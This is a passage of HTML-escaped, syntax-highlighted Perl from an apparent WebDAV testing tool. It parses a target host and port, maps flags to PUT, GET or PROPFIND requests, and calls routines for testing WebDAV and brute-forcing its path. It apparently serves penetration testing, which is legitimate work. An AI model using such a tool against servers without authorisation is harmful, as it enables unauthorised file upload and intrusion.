&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# Webserver port.&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;my&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $method&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# HTTP Method, PUT GET or .&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;my&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $xpath&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# WebDAV path on Webserver.&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;my&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $bpath&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# Bruteforce WebDAV path.&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;my&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $file&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# file name.&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;my&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $httpmethod&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;my&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $Host_Header&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# The Host header has to be changed&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="typ" style="color: rgb(234, 222, 173) !important;"&gt;GetOptions&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"target=s"&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&amp;gt;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $target&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;,&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"port=i"&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&amp;gt;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $port&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;,&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"method=s"&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&amp;gt;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $method&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;,&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"xpath=s"&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&amp;gt;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $xpath&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;,&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"bpath=s"&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&amp;gt;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $bpath&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;,&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"file=s"&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&amp;gt;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $file&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;,&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"help|?"&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&amp;gt;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;sub&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;{&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; hello&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;();&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;exit&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="lit" style="color: rgb(234, 222, 173) !important;"&gt;0&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;);&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;}&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;);&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;br /&gt;&lt;br /&gt;$error &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;.=&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"Error: You must specify a target hostn"&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;if&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;((!&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$target&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;));&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;br /&gt;$error &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;.=&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"Error: You must specify a target portn"&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;if&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;((!&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$port&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;));&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;br /&gt;$error &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;.=&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"Error: You must specify a put,get or list methodn"&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;if&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;((!&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$method&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;));&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;br /&gt;$error &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;.=&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"Error: You must specify a webdav pathn"&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;if&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;((!&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$xpath&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;)&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;&amp;amp;&amp;amp;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(!&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$bpath&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;));&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;br /&gt;$error &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;.=&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"Error: You must specify a upload or download file namen"&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;if&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;((!&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$file&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;)&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;&amp;amp;&amp;amp;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $method &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;!=&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"l"&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;);&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;br /&gt;&lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;if&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$error&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;)&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;{&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;print&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"Try $0 -help or -?' for more information.n$errorn"&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;exit&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;}&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;br /&gt;&lt;br /&gt;hello&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;();&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;if&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$method eq &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"p"&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;)&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;{&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; $httpmethod &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"PUT"&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;}&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;elsif&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$method eq &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"g"&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;)&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;{&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&amp;nbsp; $httpmethod &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"GET"&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;}&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;elsif&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$method eq &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"l"&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;)&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;{&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&amp;nbsp; $httpmethod &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"PROPFIND"&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;}&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;else&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;{&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&amp;nbsp; &lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;print&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"$method Method not accept !!!n"&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&amp;nbsp; &lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;exit&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="lit" style="color: rgb(234, 222, 173) !important;"&gt;0&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;);&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;}&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# ************************************&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# * We testing WebDAV methods first &amp;nbsp;*&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# ************************************&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;webdavtest&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$target&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;,&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$port&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;);&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;#end of WebDAV testing.&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# ****************************************&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# * We try to brute forceing WebDAV path *&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# ****************************************&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;if&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$bpath&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;)&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;{&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&amp;nbsp; $xpath &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; webdavbf&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$target&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;,&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$port&lt;/span&gt;&lt;span 